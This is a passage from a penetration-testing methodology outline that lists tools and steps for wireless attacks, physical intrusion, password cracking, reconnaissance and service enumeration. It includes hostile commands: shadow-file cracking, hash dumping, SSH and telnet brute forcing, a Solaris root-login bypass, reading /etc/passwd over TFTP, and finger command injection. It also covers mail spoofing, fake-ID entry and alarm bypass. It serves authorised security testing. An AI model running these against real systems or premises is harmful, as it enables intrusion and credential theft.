7.2.8.1. ns1 recovery and conversion tool
7.2.8.2. warbable
7.2.8.3. warkizniz
7.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
7.2.8.4. ivstools
7.2.9. IDS Tools
7.2.9.1. WIDZ
7.2.9.2. War Scanner
7.2.9.3. Snort-Wireless
7.2.9.4. AirDefense
7.2.9.5. AirMagnet
7.3. WLAN discovery
7.3.1. Unencrypted WLAN
7.3.1.1. Visible SSID
7.3.1.1.1. Sniff for IP range
7.3.1.2. Hidden SSID
7.3.1.2.1. Deauth client
7.3.2. WEP encrypted WLAN
7.3.2.1. Visible SSID
7.3.2.1.1. WEPattack
7.3.2.2. Hidden SSID
7.3.2.2.1. Deauth client
7.3.3. WPA / WPA2 encrypted WLAN
7.3.3.1. Deauth client
7.3.3.1.1. Capture EAPOL handshake
7.3.4. LEAP encrypted WLAN
7.3.4.1. Deauth client
7.3.4.1.1. Break LEAP
7.3.5. 802.1x WLAN
7.3.5.1. Create Rogue Access Point
7.3.5.1.1. Airsnarf
7.3.5.1.2. fake ap
7.3.5.1.3. Hotspotter
7.3.5.1.4. Karma
7.3.5.1.5. Linux rogue AP
7.3.6. Resources
7.3.6.1. URLs
7.3.6.1.1. Wirelessdefence.org
7.3.6.1.2. Russix
7.3.6.1.3. Wardrive.net
7.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
7.3.6.2. White Papers
7.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
7.3.6.2.2. 802.11b Firmware-Level Attacks
7.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
7.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
7.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
7.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
7.3.6.2.7. Active behavioral fingerprinting of wireless devices
7.3.6.3. Common Vulnerabilities and Exposures (CVE)
7.3.6.3.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
8. Physical Security
8.1. Building Security
8.1.1. Meeting Rooms
8.1.1.1. Check for active network jacks.
8.1.1.2. Check for any information in room.
8.1.2. Lobby
8.1.2.1. Check for active network jacks.
8.1.2.2. Does receptionist/guard leave lobby?
8.1.2.3. Accessible printers? Print test page.
8.1.2.4. Obtain phone/personnel listing.
8.1.3. Communal Areas
8.1.3.1. Check for active network jacks.
8.1.3.2. Check for any information in room.
8.1.3.3. Listen for employee conversations.
8.1.4. Room Security
8.1.4.1. Resistance of lock to picking.
8.1.4.1.1. What type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?
8.1.4.2. Ceiling access areas.
8.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
8.1.5. Windows
8.1.5.1. Check windows/doors for visible intruder alarm sensors.
8.1.5.2. Check visible areas for sensitive information.
8.1.5.3. Can you video users logging on?
8.2. Perimeter Security
8.2.1. Fence Security
8.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
8.2.2. Exterior Doors
8.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.
8.2.3. Guards
8.2.3.1. Patrol Routines
8.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
8.2.3.2. Communications
8.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.
8.3. Entry Points
8.3.1. Guarded Doors
8.3.1.1. Piggybacking
8.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.
8.3.1.2. Fake ID
8.3.1.2.1. Attempt to use fake ID to gain access.
8.3.1.3. Access Methods
8.3.1.3.1. Test 'out of hours' entry methods
8.3.2. Unguarded Doors
8.3.2.1. Identify all unguarded entry points.
8.3.2.1.1. Are doors secured?
8.3.2.1.2. Check locks for resistance to lock picking.
8.3.3. Windows
8.3.3.1. Check windows/doors for visible intruder alarm sensors.
8.3.3.1.1. Attempt to bypass sensors.
8.3.3.2. Check visible areas for sensitive information.
8.4. Office Waste
8.4.1. Dumpster Diving - Attempt to retrieve any useful information from ToE (target of evaluation) refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.
9. Password cracking
9.1. Rainbow crack
9.1.1. ophcrack
9.1.2. rainbow tables
9.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
9.2. Ophcrack
9.3. Cain & Abel
9.4. John the Ripper
9.4.1. ./unshadow passwd shadow > file_to_crack
9.4.2. ./john -single file_to_crack
9.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
9.4.4. ./john -show file_to_crack
9.4.5. ./john --incremental:All file_to_crack
9.5. fgdump
9.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} e.g. fgdump.exe -u hacker -p hard_password -c -f target.txt
9.6. pwdump6
9.6.1. pwdump [-h][-o][-u][-p] machineName
9.7. medusa
9.8. LCP
9.9. L0phtcrack (Note: This tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)
9.9.1. Domain credentials
9.9.2. Sniffing
9.9.3. pwdump import
9.9.4. sam import
9.10. aiocracker
9.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
10. Vulnerability Assessment - Using vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results are then analysed to determine whether any vulnerabilities exist that could be exploited to gain access to a target host on the network. A number of the tests carried out by these scanners are simply banner grabbing / obtaining version information; once these details are known, the version is compared against the common vulnerabilities and exposures (CVE) that have been released, and any matches are reported to the user. Other tools actually use manual pen-testing methods and display the output received, e.g. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
10.1. Manual
10.1.1. Patch Levels
10.1.2. Confirmed Vulnerabilities
10.1.2.1. Severe
10.1.2.2. High
10.1.2.3. Medium
10.1.2.4. Low
10.2. Automated
10.2.1. Reports
10.2.2. Vulnerabilities
10.2.2.1. Severe
10.2.2.2. High
10.2.2.3. Medium
10.2.2.4. Low
10.3. Tools
10.3.1. GFI
10.3.2. Nessus (Linux)
10.3.2.1. Nessus (Windows)
10.3.3. NGS Typhon
10.3.4. NGS Squirrel for Oracle
10.3.5. NGS Squirrel for SQL
10.3.6. SARA
10.3.7. MatriXay
10.3.8. BiDiBlah
10.3.9. SSA
10.3.10. Oval Interpreter
10.3.11. Xscan
10.3.12. Security Manager +
10.3.13. Inguma
10.4. Resources
10.4.1. Security Focus
10.4.2. Microsoft Security Bulletin
10.4.3. Common Vulnerabilities and Exposures (CVE)
10.4.4. National Vulnerability Database (NVD)
10.4.5. The Open Source Vulnerability Database (OSVDB)
10.4.5.1. Standalone Database
10.4.5.1.1. Update URL
10.4.6. United States Computer Emergency Response Team (US-CERT)
10.4.7. Computer Emergency Response Team
10.4.8. Mozilla Security Information
10.4.9. SANS
10.4.10. Securiteam
10.4.11. PacketStorm Security
10.4.12. Security Tracker
10.4.13. Secunia
10.4.14. Vulnerabilities.org
10.4.15. ntbugtraq
10.4.16. Wireless Vulnerabilities and Exploits (WVE)
10.5. Blogs
10.5.1. Carnal0wnage
10.5.2. Fsecure Blog
10.5.3. g0ne blog
10.5.4. GNUCitizen
10.5.5. ha.ckers Blog
10.5.6. Jeremiah Grossman Blog
10.5.7. Metasploit
10.5.8. nCircle Blogs
10.5.9. pentestmonkey.net
10.5.10. Rational Security
10.5.11. Rise Security
10.5.12. Security Fix Blog
10.5.13. Software Vulnerability Exploitation Blog
10.5.14. Taosecurity Blog
11. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are, at the lowest level, essentially pre-compiled point-and-shoot tools. These engines also have a number of other underlying features for more advanced users.
11.1. Password Attacks
11.1.1. Known Accounts
11.1.1.1. Identified Passwords
11.1.1.2. Unidentified Hashes
11.1.2. Default Accounts
11.1.2.1. Identified Passwords
11.1.2.2. Unidentified Hashes
11.2. Exploits
11.2.1. Successful Exploits
11.2.1.1. Accounts
11.2.1.1.1. Passwords
11.2.1.1.2. Groups
11.2.1.1.3. Other Details
11.2.1.2. Services
11.2.1.3. Backdoor
11.2.1.4. Connectivity
11.2.2. Unsuccessful Exploits
11.2.3. Resources
11.2.3.1. Securiteam
11.2.3.1.1. Exploits are sorted by year and must be downloaded individually
11.2.3.2. SecurityForest
11.2.3.2.1. Updated via CVS after initial install
11.2.3.3. GovernmentSecurity
11.2.3.3.1. Need to create an account to obtain access
11.2.3.4. Red Base Security
11.2.3.4.1. Oracle Exploit site only
11.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
11.2.3.5.1. Wireless Exploit Site
11.2.3.6. PacketStorm Security
11.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
11.2.3.7. SecWatch
11.2.3.7.1. Exploits sorted by year and month, downloaded separately
11.2.3.8. SecurityFocus
11.2.3.8.1. Exploits must be downloaded individually
11.2.3.9. Metasploit
11.2.3.9.1. Install and regularly update via svn
11.2.3.10. Milw0rm
11.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!
11.3. Tools
11.3.1. Metasploit
11.3.1.1. Free Extra Modules
11.3.1.1.1. local copy
11.3.2. Manual SQL Injection
11.3.2.1. Understanding SQL Injection
11.3.2.2. SQL Injection walkthrough
11.3.2.3. SQL Injection by example
11.3.2.4. Blind SQL Injection
11.3.2.5. Advanced SQL Injection in SQL Server
11.3.2.6. More Advanced SQL Injection
11.3.2.7. Advanced SQL Injection in Oracle databases
11.3.2.8. SQL Cheatsheets
11.3.2.8.1. Untitled
11.3.3. SQL Power Injector
11.3.4. SecurityForest
11.3.5. SPI Dynamics WebInspect
11.3.6. Core Impact
11.3.7. Cisco Global Exploiter
11.3.8. PIXDos
11.3.8.1. perl PIXdos.pl [--device=interface] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
11.3.9. CANVAS
11.3.10. Inguma
12. Network Backbone
12.1. Generic Toolset
12.1.1. Wireshark (Formerly Ethereal)
12.1.1.1. Passive Sniffing
12.1.1.1.1. Usernames/Passwords
12.1.1.1.2. Email
12.1.1.1.3. FTP
12.1.1.1.4. HTTP
12.1.1.1.5. HTTPS
12.1.1.1.6. RDP
12.1.1.1.7. VOIP
12.1.1.1.8. Other
12.1.1.2. Filters
12.1.1.2.1. ip.src == ip_address
12.1.1.2.2. ip.dst == ip_address
12.1.1.2.3. tcp.dstport == port_no.
12.1.1.2.4. ! ip.addr == ip_address
12.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
12.1.2. Cain & Abel
12.1.2.1. Active Sniffing
12.1.2.1.1. ARP Cache Poisoning
12.1.2.1.2. DNS Poisoning
12.1.2.1.3. Routing Protocols
12.1.3. Cisco-Torch
12.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
12.1.4. NTP-Fingerprint
12.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
12.1.5. Yersinia
12.1.6. p0f
12.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
12.1.7. Manual Check (Credentials required)
12.1.8. MAC Spoofing
12.1.8.1. mac address changer for windows
12.1.8.2. macchanger
12.1.8.2.1. Random Mac Address:- macchanger -r eth0
12.1.8.3. madmacs
12.1.8.4. smac
12.1.8.5. TMAC
13. Contributors
13.1. Matt Byrne (WirelessDefence.org)
13.1.1. Matt contributed the majority of the Wireless section.
13.2. Arvind Doraiswamy (Paladion.net)
13.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
13.3. Lee Lawson (Dns.co.uk)
13.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.
13.4. Nabil OUCHN (Security-database.com)
13.4.1. Nabil contributed the AS/400 section.
14. Pre-Inspection Visit - template
15. Network Footprinting (Reconnaissance) - The tester attempts to gather as much information as possible about the selected network. Reconnaissance can take two forms, active and passive. A passive approach is always the best starting point, as it would normally defeat intrusion detection systems and other forms of protection afforded to the network. This usually involves discovering publicly available information by utilising a web browser, visiting newsgroups, etc. An active form is more intrusive, may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
15.1. Untitled
15.1.1. Authoritative Bodies
15.1.1.1. IANA - Internet Assigned Numbers Authority
15.1.1.2. ICANN - Internet Corporation for Assigned Names and Numbers.
15.1.1.3. NRO - Number Resource Organisation
15.1.1.4. RIR - Regional Internet Registry
15.1.1.4.1. AFRINIC - African Network Information Centre
15.1.1.4.2. APNIC - Asia Pacific Network Information Centre
15.1.1.4.3. ARIN - American Registry for Internet Numbers
15.1.1.4.4. LACNIC - Latin America & Caribbean Network Information Centre
15.1.1.4.5. RIPE - Réseaux IP Européens Network Coordination Centre
15.1.2. Websites
15.1.2.1. Central Ops
15.1.2.1.1. Domain Dossier
15.1.2.1.2. Email Dossier
15.1.2.2. DNS Stuff
15.1.2.2.1. Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
15.1.2.3. Fixed Orbit
15.1.2.3.1. Autonomous System lookups and other online tools available.
15.1.2.4. Geektools
15.1.2.5. IP2Location
15.1.2.5.1. Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
15.1.2.6. Kartoo
15.1.2.6.1. Metasearch engine that visually presents its results.
15.1.2.7. MyIPNeighbors.com
15.1.2.7.1. Excellent site that gives you details of shared domains on the IP queried/ conversely IP to DNS resolution
15.1.2.8. My-IP-Neighbors.com
15.1.2.8.1. Excellent site that can be used if the above is down
15.1.2.9. myipneighbors.net
15.1.2.10. Netcraft
15.1.2.10.1. Online search tool allowing queries for host information.
15.1.2.11. Passive DNS Replication
15.1.2.11.1. Finds shared domains based on supplied IP addresses
15.1.2.11.2. Note: - Website utilised by nmap hostmap.nse script
15.1.2.12. Robtex
15.1.2.12.1. Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
15.1.2.12.2. Note: - Can be unreliable with old entries (Use CentralOps to verify)
15.1.2.13. Traceroute.org
15.1.2.13.1. Website listing a large number of links to online traceroute resources.
15.1.2.14. Wayback Machine
15.1.2.14.1. Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
15.1.2.15. Whois.net
15.1.3. Tools
15.1.3.1. Cheops-ng
15.1.3.2. Country whois
15.1.3.3. Domain Research Tool
15.1.3.4. Firefox Plugins
15.1.3.4.1. AS Number
15.1.3.4.2. Shazou
15.1.3.4.3. Firecat Suite
15.1.3.5. Gnetutil
15.1.3.6. Goolag Scanner
15.1.3.7. Greenwich
15.1.3.8. Maltego
15.1.3.9. GTWhois
15.1.3.10. Sam Spade
15.1.3.11. Smart whois
15.1.3.12. SpiderFoot
15.2. Internet Search
15.2.1. General Information
15.2.1.1. Web Investigator
15.2.1.2. Tracesmart
15.2.1.3. Friends Reunited
15.2.1.4. Ebay - profiles etc.
15.2.2. Financial
15.2.2.1. EDGAR - Company information, including real-time filings. US
15.2.2.2. Google Finance - General Finance Portal
15.2.2.3. Hoovers - Business Intelligence, Insight and Results. US and UK
15.2.2.4. Companies House UK
15.2.2.5. Land Registry UK
15.2.3. Phone book/ Electoral Roll Information
15.2.3.1. 123people
15.2.3.1.1. http://www.123people.co.uk/s/firstname+lastname/world
15.2.3.2. 192.com
15.2.3.2.1. Electoral Roll Search. UK
15.2.3.3. 411
15.2.3.3.1. Online White Pages and Yellow Pages. US
15.2.3.4. Untitled
15.2.3.4.1. Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US
15.2.3.5. BT.com. UK
15.2.3.5.1. Residential
15.2.3.5.2. Business
15.2.3.6. Pipl
15.2.3.6.1. Untitled
15.2.3.6.2. http://pipl.com/search/?Email=john%40example.com&CategoryID=4&Interface=1
15.2.3.6.3. http://pipl.com/search/?Username=????&CategoryID=5&Interface=1
15.2.3.7. Spokeo
15.2.3.7.1. http://www.spokeo.com/user?q=domain_name
15.2.3.7.2. http://www.spokeo.com/user?q=email_address
15.2.3.8. Yasni
15.2.3.8.1. http://www.yasni.co.uk/index.php?action=search&search=1&sh=&name=firstname+lastname&filter=Keyword
15.2.3.9. Zabasearch
15.2.3.9.1. People Search Engine. US
15.2.4. Generic Web Searching
15.2.4.1. Code Search
15.2.4.2. Forum Entries
15.2.4.3. Google Hacking Database
15.2.4.4. Google
15.2.4.4.1. Back end files
15.2.4.4.2. Email Addresses
15.2.4.4.3. Contact Details
15.2.4.5. Newsgroups/forums
15.2.4.6. Blog Search
15.2.4.6.1. Yammer
15.2.4.6.2. Google Blog Search
15.2.4.6.3. Technorati
15.2.4.6.4. Jaiku
15.2.4.6.5. Present.ly
15.2.4.6.6. Twitter Network Browser
15.2.4.7. Search Engine Comparison/ Aggregator Sites
15.2.4.7.1. Clusty
15.2.4.7.2. Grokker
15.2.4.7.3. Zuula
15.2.4.7.4. Exalead
15.2.4.7.5. Delicious
15.2.5. Metadata Search
15.2.5.1. Untitled
15.2.5.1.1. MetaData Visualisation Sites
15.2.5.1.2. Tools
15.2.5.1.3. Wikipedia Metadata Search
15.2.6. Social/ Business Networks
15.2.6.1. Untitled
15.2.6.1.1. Africa
15.2.6.1.2. Australia
15.2.6.1.3. Belgium
15.2.6.1.4. Holland
15.2.6.1.5. Hungary
15.2.6.1.6. Iran
15.2.6.1.7. Japan
15.2.6.1.8. Korea
15.2.6.1.9. Poland
15.2.6.1.10. Russia
15.2.6.1.11. Sweden
15.2.6.1.12. UK
15.2.6.1.13. US
15.2.6.1.14. Assorted
15.2.7. Resources
15.2.7.1. OSINT
15.2.7.2. International Directory of Search Engines
15.3. DNS Record Retrieval from publicly available servers
15.3.1. Types of Information Records
15.3.1.1. SOA Records - Indicates the server that has authority for the domain.
15.3.1.2. MX Records - List of a host’s or domain’s mail exchanger server(s).
15.3.1.3. NS Records - List of a host’s or domain’s name server(s).
15.3.1.4. A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
15.3.1.5. PTR Records - Reverse lookup record that maps an IP address back to a host's domain name.
15.3.1.6. SRV Records - Service location record.
15.3.1.7. HINFO Records - Host information record with CPU type and operating system.
15.3.1.8. TXT Records - Generic text record.
15.3.1.9. CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
15.3.1.10. RP - Responsible person for the domain.
15.3.2. Database Settings
15.3.2.1. Version.bind
15.3.2.2. Serial
15.3.2.3. Refresh
15.3.2.4. Retry
15.3.2.5. Expiry
15.3.2.6. Minimum
15.3.3. Sub Domains
15.3.4. Internal IP ranges
15.3.4.1. Reverse DNS for IP Range
15.3.5. Zone Transfer
15.4. Social Engineering
15.4.1. Remote
15.4.1.1. Phone
15.4.1.1.1. Scenarios
15.4.1.1.2. Results
15.4.1.1.3. Contact Details
15.4.1.2. Email
15.4.1.2.1. Scenarios
15.4.1.2.2. Software
15.4.1.2.3. Results
15.4.1.2.4. Contact Details
15.4.1.3. Other
15.4.2. Local
15.4.2.1. Personas
15.4.2.1.1. Name
15.4.2.1.2. Phone
15.4.2.1.3. Email
15.4.2.1.4. Business Cards
15.4.2.2. Contact Details
15.4.2.2.1. Name
15.4.2.2.2. Phone number
15.4.2.2.3. Email
15.4.2.2.4. Room number
15.4.2.2.5. Department
15.4.2.2.6. Role
15.4.2.3. Scenarios
15.4.2.3.1. New IT employee
15.4.2.3.2. Fire Inspector
15.4.2.4. Results
15.4.2.5. Maps
15.4.2.5.1. Satellite Imagery
15.4.2.5.2. Building layouts
15.4.2.6. Other
15.5. Dumpster Diving
15.5.1. Rubbish Bins
15.5.2. Contract Waste Removal
15.5.3. Ebay ex-stock sales i.e. HDD
15.6. Web Site copy
15.6.1. httrack
15.6.2. teleport pro
15.6.3. Black Widow
16. Enumeration
16.1. Daytime port 13 open
16.1.1. nmap nse script
16.1.1.1. daytime
16.2. FTP port 21 open
16.2.1. Fingerprint server
16.2.1.1. telnet ip_address 21 (Banner grab)
16.2.1.2. Run command ftp ip_address
16.2.1.3. ftp@example.com
16.2.1.4. Check for anonymous access
16.2.1.4.1. ftp ip_address - Username: anonymous OR anon; Password: any@email.com
16.2.2. Password guessing
16.2.2.1. Hydra brute force
16.2.2.2. medusa
16.2.2.3. Brutus
16.2.3. Examine configuration files
16.2.3.1. ftpusers
16.2.3.2. ftp.conf
16.2.3.3. proftpd.conf
16.2.4. MiTM
16.2.4.1. pasvagg.pl
16.3. SSH port 22 open
16.3.1. Fingerprint server
16.3.1.1. telnet ip_address 22 (banner grab)
16.3.1.2. scanssh
16.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
16.3.2. Password guessing
16.3.2.1. ssh root@ip_address
16.3.2.2. guess-who
16.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
16.3.2.3. Hydra brute force
16.3.2.4. brutessh
16.3.2.5. Ruby SSH Bruteforcer
16.3.3. Examine configuration files
16.3.3.1. ssh_config
16.3.3.2. sshd_config
16.3.3.3. authorized_keys
16.3.3.4. ssh_known_hosts
16.3.3.5. .shosts
16.3.4. SSH Client programs
16.3.4.1. tunnelier
16.3.4.2. winsshd
16.3.4.3. putty
16.3.4.4. winscp
16.4. Telnet port 23 open
16.4.1. Fingerprint server
16.4.1.1. telnet ip_address
16.4.1.1.1. Common Banner List (OS / Banner)
16.4.1.1.1.1. Solaris 8 / SunOS 5.8
16.4.1.1.1.2. Solaris 2.6 / SunOS 5.6
16.4.1.1.1.3. Solaris 2.4 or 2.5.1 / Unix(r) System V Release 4.0 (hostname)
16.4.1.1.1.4. SunOS 4.1.x / SunOS Unix (hostname)
16.4.1.1.1.5. FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
16.4.1.1.1.6. NetBSD / NetBSD/i386 (hostname) (ttyp1)
16.4.1.1.1.7. OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
16.4.1.1.1.8. Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
16.4.1.1.1.9. Debian 3.0 / Debian GNU/Linux 3.0 / hostname
16.4.1.1.1.10. SGI IRIX 6.x / IRIX (hostname)
16.4.1.1.1.11. IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
16.4.1.1.1.12. IBM AIX 4.2.x or 4.3.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
16.4.1.1.1.13. Nokia IPSO / IPSO (hostname) (ttyp0)
16.4.1.1.1.14. Cisco IOS / User Access Verification
16.4.1.1.1.15. Livingston ComOS / ComOS - Livingston PortMaster
16.4.1.2. telnetfp
16.4.2. Password Attack
16.4.2.1. Untitled
16.4.2.2. Hydra brute force
16.4.2.3. Brutus
16.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
16.4.3. Examine configuration files
16.4.3.1. /etc/inetd.conf
16.4.3.2. /etc/xinetd.d/telnet
16.4.3.3. /etc/xinetd.d/stelnet
16.5. Sendmail Port 25 open
16.5.1. Fingerprint server
16.5.1.1. telnet ip_address 25 (banner grab)
16.5.2. Mail Server Testing
16.5.2.1. Enumerate users
16.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
16.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
16.5.2.2. Mail Spoof Test
16.5.2.2.1. Manual SMTP session (one command per line)
16.5.2.2.1.1. HELO anything
16.5.2.2.1.2. MAIL FROM: spoofed_address
16.5.2.2.1.3. RCPT TO: valid_mail_account
16.5.2.2.1.4. DATA
16.5.2.2.1.5. . (a single dot on its own line terminates the message body)
16.5.2.2.1.6. QUIT
16.5.2.3. Mail Relay Test
16.5.2.3.1. Untitled
16.5.3. Examine Configuration Files
16.5.3.1. sendmail.cf
16.5.3.2. submit.cf
16.6. DNS port 53 open
16.6.1. Fingerprint server/ service
16.6.1.1. host
16.6.1.1.1. host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] name [server]
16.6.1.1.1.1. -v verbose format
16.6.1.1.1.2. -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.
16.6.1.1.1.3. -a Same as -t ANY.
16.6.1.1.1.4. -l Zone transfer (if allowed).
16.6.1.1.1.5. -f Save to a specified filename.
16.6.1.2. nslookup
16.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
16.6.1.3. dig
16.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
16.6.1.4. whois
16.6.1.4.1. -h Use the named host to resolve the query
16.6.1.4.2. -a Use ARIN to resolve the query
16.6.1.4.3. -r Use RIPE to resolve the query
16.6.1.4.4. -p Use APNIC to resolve the query
16.6.1.4.5. -Q Perform a quick lookup
16.6.2. DNS Enumeration
16.6.2.1. Bile Suite
16.6.2.1.1. perl BiLE.pl [website] [project_name]
16.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
16.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
16.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
16.6.2.1.5. perl exp-tld.pl [input file] [output file]
16.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
16.6.2.1.7. perl qtrace.pl [ip_address_file] [output_file]
16.6.2.1.8. perl jarf-rev [subnetblock] [nameserver]
16.6.2.2. txdns
16.6.2.2.1. txdns -rt -t domain_name
16.6.2.2.2. txdns -x 50 -bb domain_name
16.6.2.2.3. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c:\hostlist.txt
16.6.2.3. nmap nse scripts
16.6.2.3.1. dns-random-srcport
16.6.2.3.2. dns-random-txid
16.6.2.3.3. dns-recursion
16.6.2.3.4. dns-zone-transfer
16.6.3. Examine Configuration Files
16.6.3.1. host.conf
16.6.3.2. resolv.conf
16.6.3.3. named.conf
16.7. TFTP port 69 open
16.7.1. TFTP Enumeration
16.7.1.1. tftp ip_address PUT local_file
16.7.1.2. tftp ip_address GET conf.txt (or other files)
16.7.1.3. Solarwinds TFTP server
16.7.1.4. tftp -i <IP> GET /etc/passwd (old Solaris)
16.7.2. TFTP Bruteforcing
16.7.2.1. TFTP bruteforcer
16.7.2.2. Cisco-Torch
16.8. Finger Port 79 open
16.8.1. User enumeration
16.8.1.1. finger 'a b c d e f g h' @example.com
16.8.1.2. finger admin@example.com
16.8.1.3. finger user@example.com
16.8.1.4. finger 0@example.com
16.8.1.5. finger .@example.com
16.8.1.6. finger **@example.com
16.8.1.7. finger test@example.com
16.8.1.8. finger @example.com
16.8.1.9. nmap nse script
16.8.1.9.1. finger
16.8.2. Command execution
16.8.2.1. finger "|/bin/id@example.com"
16.8.2.2. finger "|/bin/ls -a /@example.com"
16.8.3. Finger Bounce
16.8.3.1. finger user@host@victim
16.8.3.2. finger @internal@external
16.9. Web Ports 80,8080 etc. open
16.9.1. Fingerprint server
16.9.1.1. Telnet ip_address port
16.9.1.2. Firefox plugins
16.9.1.2.1. All
16.9.1.2.2. Specific
16.9.2. Crawl website
16.9.2.1. lynx [options] startfile/URL
16.9.2.1.1. Options include -traversal -crawl -dump -image_links -source
16.9.2.2. httprint
16.9.2.3. Metagoofil
16.9.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
16.9.3. Web Directory enumeration
16.9.3.1. Nikto
16.9.3.1.1. nikto [-h target] [options]
16.9.3.2. DirBuster
16.9.3.3. Wikto
16.9.3.4. Goolag Scanner
16.9.4. Vulnerability Assessment
16.9.4.1. Manual Tests
16.9.4.1.1. Default Passwords
16.9.4.1.2. Install Backdoors
16.9.4.1.3. Method Testing
16.9.4.1.4. Upload Files
16.9.4.1.5. View Page Source
16.9.4.1.6. Input Validation Checks
16.9.4.1.7. Automated table and column iteration
16.9.4.2. Vulnerability Scanners
16.9.4.2.1. Acunetix
16.9.4.2.2. Grendelscan
16.9.4.2.3. NStealth
16.9.4.2.4. Obiwan III
16.9.4.2.5. w3af
16.9.4.3. Specific Applications/ Server Tools
16.9.4.3.1. Domino
16.9.4.3.2. Joomla
16.9.4.3.3. aspaudit.pl
16.9.4.3.4. Vbulletin
16.9.4.3.5. ZyXel
16.9.5. Proxy Testing
16.9.5.1. Burpsuite
16.9.5.2. Crowbar
16.9.5.3. Interceptor
16.9.5.4. Paros
16.9.5.5. Requester Raw
16.9.5.6. Suru
16.9.5.7. WebScarab
16.9.6. Examine configuration files
16.9.6.1. Generic
16.9.6.1.1. Examine httpd.conf/ windows config files
16.9.6.2. JBoss
16.9.6.2.1. JMX Console http://<IP>:8080/jmx-console/
16.9.6.3. Joomla
16.9.6.3.1. configuration.php
16.9.6.3.2. diagnostics.php
16.9.6.3.3. joomla.inc.php
16.9.6.3.4. config.inc.php
16.9.6.4. Mambo
16.9.6.4.1. configuration.php
16.9.6.4.2. config.inc.php
16.9.6.5. Wordpress
16.9.6.5.1. setup-config.php
16.9.6.5.2. wp-config.php
16.9.6.6. ZyXel
16.9.6.6.1. /WAN.html (contains PPPoE ISP password)
16.9.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
16.9.6.6.3. /rpDyDNS.html (contains DDNS credentials)
16.9.6.6.4. /Firewall_DefPolicy.html (Firewall)
16.9.6.6.5. /CF_Keyword.html (Content Filter)
16.9.6.6.6. /RemMagWWW.html (Remote MGMT)
16.9.6.6.7. /rpSysAdmin.html (System)
